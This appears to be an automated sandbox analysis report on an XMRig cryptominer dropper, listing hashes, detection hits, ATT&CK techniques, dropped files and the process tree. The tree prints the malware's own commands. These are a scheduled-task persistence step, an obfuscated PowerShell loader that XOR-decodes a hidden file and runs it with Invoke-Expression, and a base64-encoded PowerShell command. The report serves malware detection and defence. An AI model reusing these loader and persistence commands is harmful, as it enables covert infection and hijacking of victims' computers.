xmrig | 999ccb89b50eb12cb0492fa25cd23a1bf796440b7b8d2f13616a1ada3ea619da

Analysis

max time kernel
148s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
11/06/2024, 04:25

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe
Size

4.5MB
MD5

0e1120a60dde74aa5a2014f91e34329b
SHA1

3cfcb31dcb09b575035e2f56e7dada82c912e374
SHA256

999ccb89b50eb12cb0492fa25cd23a1bf796440b7b8d2f13616a1ada3ea619da
SHA512

62668493fb4c4d99ec31fa5246e19d7a36533f854cc239b7614ee57f7a34926a6e69427aef6446ff8542af146cda3f4554db8f0f013b5225e076bc457ece042a
SSDEEP

98304:3MDtIXLr06AdfEThF35PzuH85FVEpWkLf2miAPK:BrmEdF3l5FVEoif2m/PK

Score

10^/10

xmrig execution miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral2/files/0x0007000000023420-23.dat	xmrig
behavioral2/memory/2168-63-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/2168-67-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/2168-68-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/2168-69-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/2168-72-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/2168-73-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/2168-74-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/2168-75-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	maintenance.exe

Executes dropped EXE 3 IoCs

pid	Process
4264	2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe
3760	maintenance.exe
2168	idle_maintenance.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3668	powershell.exe
3480	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2064	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5024	timeout.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
4264	2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe
4264	2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe
3760	maintenance.exe
3760	maintenance.exe
3668	powershell.exe
3668	powershell.exe
3668	powershell.exe
3668	powershell.exe
3668	powershell.exe
3480	powershell.exe
3480	powershell.exe
3480	powershell.exe
3480	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2168	idle_maintenance.exe
Token: SeLockMemoryPrivilege	2168	idle_maintenance.exe
Token: SeDebugPrivilege	3668	powershell.exe
Token: SeDebugPrivilege	3480	powershell.exe

Suspicious use of WriteProcessMemory 29 IoCs

description	pid	Process	procid_target
PID 2688 wrote to memory of 2068	2688	2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe	81
PID 2688 wrote to memory of 2068	2688	2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe	81
PID 2688 wrote to memory of 2068	2688	2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe	81
PID 2688 wrote to memory of 2316	2688	2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe	83
PID 2688 wrote to memory of 2316	2688	2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe	83
PID 2688 wrote to memory of 2316	2688	2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe	83
PID 2068 wrote to memory of 4104	2068	cmd.exe	85
PID 2068 wrote to memory of 4104	2068	cmd.exe	85
PID 2068 wrote to memory of 4104	2068	cmd.exe	85
PID 2316 wrote to memory of 3020	2316	cmd.exe	86
PID 2316 wrote to memory of 3020	2316	cmd.exe	86
PID 2316 wrote to memory of 3020	2316	cmd.exe	86
PID 2068 wrote to memory of 2064	2068	cmd.exe	87
PID 2068 wrote to memory of 2064	2068	cmd.exe	87
PID 2068 wrote to memory of 2064	2068	cmd.exe	87
PID 2316 wrote to memory of 4264	2316	cmd.exe	88
PID 2316 wrote to memory of 4264	2316	cmd.exe	88
PID 2316 wrote to memory of 4264	2316	cmd.exe	88
PID 2316 wrote to memory of 5024	2316	cmd.exe	89
PID 2316 wrote to memory of 5024	2316	cmd.exe	89
PID 2316 wrote to memory of 5024	2316	cmd.exe	89
PID 3760 wrote to memory of 2168	3760	maintenance.exe	102
PID 3760 wrote to memory of 2168	3760	maintenance.exe	102
PID 3760 wrote to memory of 3668	3760	maintenance.exe	104
PID 3760 wrote to memory of 3668	3760	maintenance.exe	104
PID 3760 wrote to memory of 3668	3760	maintenance.exe	104
PID 3668 wrote to memory of 3480	3668	powershell.exe	106
PID 3668 wrote to memory of 3480	3668	powershell.exe	106
PID 3668 wrote to memory of 3480	3668	powershell.exe	106

C:\Users\Admin\AppData\Local\Temp\2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe
"C:\Users\Admin\AppData\Local\Temp\2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2688
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zbe20246114261372.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2068
- - C:\Windows\SysWOW64\schtasks.exe
    Schtasks.Exe /delete /tn "Maintenance" /f
    3⤵
    PID:4104
- - C:\Windows\SysWOW64\schtasks.exe
    Schtasks.Exe /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20246114261372.xml"
    3⤵
    - Creates scheduled task(s)
    PID:2064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zb20246114261372.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2316
- - C:\Windows\SysWOW64\chcp.com
    chcp 1251
    3⤵
    PID:3020
- - C:\Users\Admin\AppData\Local\Temp\2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-06-11_0e1120a60dde74aa5a2014f91e34329b_magniber_nymaim.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4264
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 3 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:5024

C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe .
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3760
- C:\Users\Admin\AppData\Local\Temp\4f424a4959554945486461686081462257963315222\idle_maintenance.exe
  C:\Users\Admin\AppData\Local\Temp\4f424a4959554945486461686081462257963315222\idle_maintenance.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2168
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -c "if($host.version.major -lt 3){exit}$d =[IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Roaming\Maintenance\mod');$l=$d.Count;$m = New-Object Byte[] $l;[byte[]] $x=113,213,132,83,253,174,194,125;$j=0;for($i=0;$i -lt $l;$i++){$m[$i]=$d[$i] -bxor $x[$j];$j++;if($j -ge 8){$j=0}}$a = New-Object IO.MemoryStream(,$m);$b = New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream($a,[IO.Compression.CompressionMode]::Decompress));$c=$b.ReadToEnd();$b.Close();$a.Close();Invoke-Expression($c)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3668
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand ZgB1AG4AYwB0AGkAbwBuACAAYwBoAGsAcAByAGMAKAAkAHAAKQB7AA0ACgAgACgAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAFAAcgBvAGMAZQBzAHMATgBhAG0AZQApAC4AUAByAG8AYwBlAHMAcwBOAGEAbQBlACAALQBjAG8AbgB0AGEAaQBuAHMAIAAiACQAcAAiACkADQAKAH0ADQAKAGkAZgAoAGMAaABrAHAAcgBjACgAJwBtAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwApACkAewANAAoAIABXAGEAaQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBhAG0AZQAgACcAbQBhAGkAbgB0AGUAbgBhAG4AYwBlACcADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHcAbQBuAHQAbgBuAGMAJwApACkAewANAAoAIAAgAFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcAIAAtAEYAbwByAGMAZQANAAoAIAAgAFcAYQBpAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcADQAKACAAfQAgAA0ACgAgACQAcAByAHQAYwA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AQAB7AA0ACgAgACAAUwB0AGEAcgB0AEkAbgBmAG8AIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAF0AQAB7AA0ACgAgACAAVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIABGAGkAbABlAE4AYQBtAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQBcAGEAcABwAHMAXABtAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAnAA0ACgAgACAAQQByAGcAdQBtAGUAbgB0AHMAIAA9ACAAJwAtACcADQAKACAAIABDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIAB9AA0ACgAgAH0ADQAKACAAJABwAHIAdABjAC4AUwB0AGEAcgB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwApACkAewBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEYAbwByAGMAZQB9AA0ACgAgAGUAeABpAHQADQAKAH0A
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\4f424a4959554945486461686081462257963315222\config.json

Filesize
3KB

MD5
f5c720089adbe64e245bb11b1295f2dd

SHA1
88cda8d2da81d5a3f82bbbafd77d9086d57ed918

SHA256
8bbb233e1ee931bdadb5f02841a1851749d305d4b98f94b129cd7ebbb0d91d1c

SHA512
2b6b53055fd33902d87d2d653addf6bf88b5a6d6e6f21da24cdf47ef152e45eb7a8ff6351978f409bfcce009bde0227750daa092a34a0bbc2e42ceae6adde498

Download Submit
C:\Users\Admin\AppData\Local\Temp\4f424a4959554945486461686081462257963315222\idle_maintenance.exe

Filesize
3.5MB

MD5
e2af153ed50cb5ef457972e656f1bc51

SHA1
efe31f03ec2ce99ba4ff8d573734fc4259a28edf

SHA256
043f0954abf32bf6d1669cf456a439accc7421af3ee7608e23c8e2b6e6a27c1c

SHA512
2576c511868849ab258ef0bbe2fb3cbfe72eb02dc0ab5f4d7004d7a59ff5bfba035f54a2dc7ca55d569f51d2f4de654643fafa29905b32e1b1b498ff050c699e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_trpmi21f.rbt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\zb20246114261372.bat

Filesize
732B

MD5
2fc075d7c1a6f4acf73d3b770339c7f3

SHA1
d3bf14d24ba38544f6be18458e89b78270b31da8

SHA256
a49585ec9db657f8b9ec32c7f3e395ef456f21fd6c8cba4cd7dcba0e7b046f2f

SHA512
f84ebdc28a7e54b3b0b81044315cfd7c03c519ee76e7e5fb4c1807e504255bb8b1c04486a578574cb680f701052bdf240903db60e91af081acccb2c117ec2502

Download Submit
C:\Users\Admin\AppData\Local\Temp\zbe20246114261372.bat

Filesize
259B

MD5
8a6bc1a195bc8889ceeaa7161370b356

SHA1
73f8da9b7f88843eea59c082006b848329290d04

SHA256
1e0578b7736e87fb6e75f46590d648d2ffc2a393e28a048669ed9d5c10fdc0a9

SHA512
69e642441cf2b843f6b1ca917ebf3e69d72aafb79bacada68f2cee65a49ec7ea0c55d878e47e597bf6b57a5cb1b69e48766905ea185d99244938e449b401b2b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ze20246114261372.tmp

Filesize
4.5MB

MD5
7816843f58976ccc9e79a59970452656

SHA1
5fa10d6cf6c04df9158bfb415b255b201c340e39

SHA256
173bd525fe124bfeef7649d0b71f6f768c7a9f93ff0eb3a2a5c6eb69781ee9a4

SHA512
37193148ba1f8d3e6a1c3cda41cb8ff04c2086332c20a0840b58bfb9772a5bdb9983abfc252057fa0c634eac5d2e06c5c5784f829095b418c98057af51e4e260

Download Submit
C:\Users\Admin\AppData\Local\Temp\zx20246114261372.xml

Filesize
1KB

MD5
68adbde1e5ebfc45730ad5780970f2b4

SHA1
bf9243b15961132c25659e8614a19f821207add6

SHA256
387138a9629386c63997f437f294fc751dcac0033768eec2af038c6cfd66538e

SHA512
7fec0b0b7716c98ce697a36014639507e3da9c179f815e27438c92b390056e9a1409d3a9a06f5608a55777f99913ba8526db6d67ca0b2000ad4c5a299d7d04da

Download Submit
C:\Users\Admin\AppData\Roaming\Maintenance\apps\m

Filesize
11B

MD5
57cb773ae7a82c8c8aae12fa8f8d7abd

SHA1
5b30e2c5ecb965cd571ebe6fa56b9b1db7e21ae4

SHA256
8589c63b0943a62bfda9b35dccc71a30f5677386f6f7c644c3307465ce2cfa55

SHA512
2b76813958b443598c8dbaba0d8e1048d49549862afd49828871d833ff5266cdded2625bf0147dc2be42f857196d34ec6fe4967e49a60b972c014cff51fc0ca8

Download Submit
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe

Filesize
2.2MB

MD5
73ad6d009f1c53c23f5d068caa805299

SHA1
f50493f49c3b2b3697b5eb571738dbc70383cac0

SHA256
a77315296dc58edac4959c9ed69ec96e9517883684edaeba3e64c48a44c186ae

SHA512
1f9c739c7b745ba57b3d7e50e00bac9d3019de25aab5bb22c0da810d963dab93d71c56686fccf737cf87a4c95fe53b8e4b3dda09ac1526fb4899aa0e1336e920

Download Submit
C:\Users\Admin\AppData\Roaming\Maintenance\mod

Filesize
7KB

MD5
ecc35a7b251ef5d331ef43f9797b7484

SHA1
5194be19b6edb7733466d0ec7c376c2e781f0d5c

SHA256
86af0d04d203ae724c8b66decacffbc58b6cd095184e68d8f5eb1577817943ac

SHA512
254fa03e2d62510407b35a3d559068233402702b416d7622aa5fb7524b166cdc29052d263afb648347fbe1012ca32bdb75abeba5cbfa005a7ac5e45e9e23de14

Download Submit
memory/2168-74-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/2168-72-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/2168-73-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/2168-69-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/2168-68-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/2168-67-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/2168-75-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/2168-26-0x00000000001E0000-0x00000000001F4000-memory.dmp

Filesize
80KB

Download
memory/2168-63-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/3668-29-0x0000000002EF0000-0x0000000002F26000-memory.dmp

Filesize
216KB

Download
memory/3668-50-0x00000000078C0000-0x00000000078E2000-memory.dmp

Filesize
136KB

Download
memory/3668-51-0x00000000088A0000-0x0000000008E44000-memory.dmp

Filesize
5.6MB

Download
memory/3668-49-0x0000000007BA0000-0x0000000007C36000-memory.dmp

Filesize
600KB

Download
memory/3668-48-0x0000000006E10000-0x0000000006E2A000-memory.dmp

Filesize
104KB

Download
memory/3668-47-0x0000000008220000-0x000000000889A000-memory.dmp

Filesize
6.5MB

Download
memory/3668-45-0x00000000068E0000-0x000000000692C000-memory.dmp

Filesize
304KB

Download
memory/3668-44-0x00000000068A0000-0x00000000068BE000-memory.dmp

Filesize
120KB

Download
memory/3668-43-0x0000000006260000-0x00000000065B4000-memory.dmp

Filesize
3.3MB

Download
memory/3668-33-0x00000000061B0000-0x0000000006216000-memory.dmp

Filesize
408KB

Download
memory/3668-32-0x0000000006140000-0x00000000061A6000-memory.dmp

Filesize
408KB

Download
memory/3668-31-0x0000000005870000-0x0000000005892000-memory.dmp

Filesize
136KB

Download
memory/3668-30-0x0000000005AA0000-0x00000000060C8000-memory.dmp

Filesize
6.2MB

Download